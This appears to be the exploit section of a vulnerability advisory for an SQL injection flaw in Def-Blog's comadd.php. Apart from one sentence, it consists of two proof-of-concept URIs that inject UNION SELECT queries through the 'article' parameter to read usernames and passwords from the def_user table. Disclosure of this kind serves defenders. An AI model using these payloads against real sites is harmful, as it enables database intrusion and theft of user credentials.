• info
• discussion
• exploit
• solution
• references

Def-Blog Comadd.PHP SQL Injection Vulnerability

Attackers can exploit these issues via a web client.

The following proofs-of-concept URIs are available:

http://www.example.com/comadd.php?article=-1%20union%20select%20null,pseudo%20from%20def_user
http://www.example.com/comadd.php?article=-1%20union%20select%20null,mdp%20from%20def_user